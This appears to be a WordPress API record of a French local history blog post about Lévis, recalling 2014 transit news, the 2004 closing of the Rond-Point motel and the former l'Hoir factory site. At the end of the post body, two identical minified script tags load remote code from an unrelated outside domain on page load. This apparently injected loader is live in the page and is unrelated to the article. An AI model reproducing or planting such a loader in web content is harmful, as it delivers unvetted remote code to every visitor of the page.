{"id":16422,"date":"2024-02-17T16:47:41","date_gmt":"2024-02-17T21:47:41","guid":{"rendered":"https:\/\/www.levisurbain.ca\/?p=16422"},"modified":"2025-11-22T10:42:33","modified_gmt":"2025-11-22T15:42:33","slug":"fevrier-dans-lhistoire-de-levis","status":"publish","type":"post","link":"http:\/\/www.levisurbain.ca\/?p=16422","title":{"rendered":"Retour vers le pass\u00e9 : f\u00e9vrier en 2014 et 2004"},"content":{"rendered":"<p>Faisons un petit retour dans le pass\u00e9 pour regarder ce qui s&rsquo;est pass\u00e9 en ce mois de f\u00e9vrier dans l&rsquo;histoire de L\u00e9vis.<\/p>\n<p>Il y a dix ans, soit en 2014, voici ce qui faisait l&rsquo;actualit\u00e9. Il \u00e9tait beaucoup question de transport en commun.<\/p>\n<ul>\n<li><a href=\"https:\/\/www.levisurbain.ca\/?p=8815\">Feu vert au m\u00e9trobus \u00e0 L\u00e9vis<\/a>.<\/li>\n<li><a href=\"https:\/\/www.levisurbain.ca\/?p=8835\">L&rsquo;essai de midibus \u00e0 L\u00e9vis<\/a>.<\/li>\n<li><a href=\"https:\/\/www.levisurbain.ca\/?p=8842\">Une fusion STL\u00e9vis et du RTC ?<\/a><\/li>\n<\/ul>\n<p>En 2004 c&rsquo;est <a href=\"https:\/\/www.levisurbain.ca\/?p=1534\">la fin de l\u2019h\u00f4tel Rond-Point<\/a> qui alimentait les discussions.<\/p>\n<p>Le motel Rond-Point \u00e9tait d&rsquo;abord une auberge de 3 chambres avec 7 cabines. Son ouverture remonterait \u00e0 la fin des ann\u00e9es 40. Son premier propri\u00e9taire a \u00e9t\u00e9 G\u00e9rard Poulin. Son deuxi\u00e8me propri\u00e9taire, qui a acquis les cabines Rond-point vers 1953, \u00e9tait Jeannot Breton. Il a eu les cabines Rond-point jusqu&rsquo;en 1957-58. Il y avait ouvert un restaurant et un poste d&rsquo;essence. Par la suite, les Cabines Rond-point sont devenues le Motel Rond-Point jusqu&rsquo;en 2004. Un IGA tr\u00f4ne maintenant sur le terrain du d\u00e9funt motel Rond-Point.<\/p>\n<p><P><A href=\"http:\/\/www.levisurbain.ca\/wp-content\/uploads\/IGA-2.jpg\"><IMG src=\"http:\/\/www.levisurbain.ca\/wp-content\/uploads\/IGA-1.jpg\" alt=\"Le nouveau IGA\" border=0><\/A><br \/>\nCr&eacute;dit photo: Yves Gagn&eacute;<\/p>\n<p><a name=\"more\"><\/a><\/p>\n<p>Sur ce sujet, je vous invite \u00e0 visiter ce qui se trouve via ces deux liens :<\/p>\n<ul>\n<li><a href=\"https:\/\/www.flickr.com\/photos\/motelqc\/3831076110\/\" rel=\"noopener\" target=\"_blank\">Vieille carte postale du motel<\/a>.<\/li>\n<li><a href=\"https:\/\/www.facebook.com\/photo\/?fbid=849009251797453&#038;set=le-motel-rond-point-situ%C3%A9-%C3%A0-lintersection-de-la-route-kennedy-et-du-boulevard-de\" rel=\"noopener\" target=\"_blank\">Conversation sur le sujet sur Facebook<\/a>.<\/li>\n<\/ul>\n<p>Il \u00e9tait \u00e9galement question de <a href=\"https:\/\/www.levisurbain.ca\/?p=1533\">projets<\/a> (encore une fois) pour revitaliser le site de l&rsquo;ancienne usine l&rsquo;Hoir en bordure du Fleuve.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.levisurbain.ca\/wp-content\/uploads\/usineHoir.jpg\"\/><\/p>\n<p>Au final, l&rsquo;ancienne usine l&rsquo;Hoir a \u00e9t\u00e9 d\u00e9molie en septembre 2007.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.levisurbain.ca\/wp-content\/uploads\/hoirsept07_1.jpg\" width=\"80%\" height=\"80%\"\/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.levisurbain.ca\/wp-content\/uploads\/hoirsept07_2.jpg\" width=\"80%\" height=\"80%\"\/><\/p>\n<p><script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script><script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Faisons un petit retour dans le pass\u00e9 pour regarder ce qui s&rsquo;est pass\u00e9 en ce mois de f\u00e9vrier dans l&rsquo;histoire de L\u00e9vis.<\/p>\n<p>Il y a dix ans, soit en 2014, voici ce qui faisait l&rsquo;actualit\u00e9. Il \u00e9tait beaucoup question de transport en commun.<\/p>\n<p>&nbsp;&#9632; &nbsp;<a href=\"https:\/\/www.levisurbain.ca\/?p=8815\">Feu vert au m\u00e9trobus \u00e0 L\u00e9vis<\/a>.<br \/>\n&nbsp;&#9632; &nbsp;<a href=\"https:\/\/www.levisurbain.ca\/?p=8835\">L&rsquo;essai de midibus \u00e0 L\u00e9vis<\/a>.<br \/>\n&nbsp;&#9632; &nbsp;<a href=\"https:\/\/www.levisurbain.ca\/?p=8842\">Une fusion STL\u00e9vis et du RTC ?<\/a>.<\/p>\n<p>En 2004 c&rsquo;est <a href=\"https:\/\/www.levisurbain.ca\/?p=1534\">la fin de l\u2019h\u00f4tel Rond-Point<\/a> qui alimentait les discussions.<\/p>\n<p>Le motel Rond-Point \u00e9tait d&rsquo;abord une auberge de 3 chambres avec 7 cabines. Son ouverture remonterait \u00e0 la fin des ann\u00e9es 40. Son premier propri\u00e9taire a \u00e9t\u00e9 G\u00e9rard Poulin. Son deuxi\u00e8me propri\u00e9taire, qui a acquis les cabines Rond-point vers 1953, \u00e9tait Jeannot Breton. Il a eu les cabines Rond-point jusqu&rsquo;en 1957-58. Il y avait ouvert un restaurant et un poste d&rsquo;essence. Par la suite, les Cabines Rond-point sont devenues le Motel Rond-Point jusqu&rsquo;en 2004. Un IGA tr\u00f4ne maintenant sur le terrain du d\u00e9funt motel Rond-Point.<\/p>\n<p><P><A href=\"http:\/\/www.levisurbain.ca\/wp-content\/uploads\/IGA-2.jpg\"><IMG src=\"http:\/\/www.levisurbain.ca\/wp-content\/uploads\/IGA-1.jpg\" alt=\"Le nouveau IGA\" border=0><\/A><br \/>\nCr&eacute;dit photo: Yves Gagn&eacute;<\/p>\n<p><a href=\"https:\/\/www.levisurbain.ca\/?p=16422#more\">Lire la suite \u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58,69,60],"tags":[],"class_list":["post-16422","post","type-post","status-publish","format-standard","hentry","category-commerce-economie","category-histoire-urbaine","category-transports"],"_links":{"self":[{"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16422","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16422"}],"version-history":[{"count":11,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16422\/revisions"}],"predecessor-version":[{"id":24462,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16422\/revisions\/24462"}],"wp:attachment":[{"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16422"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16422"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16422"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}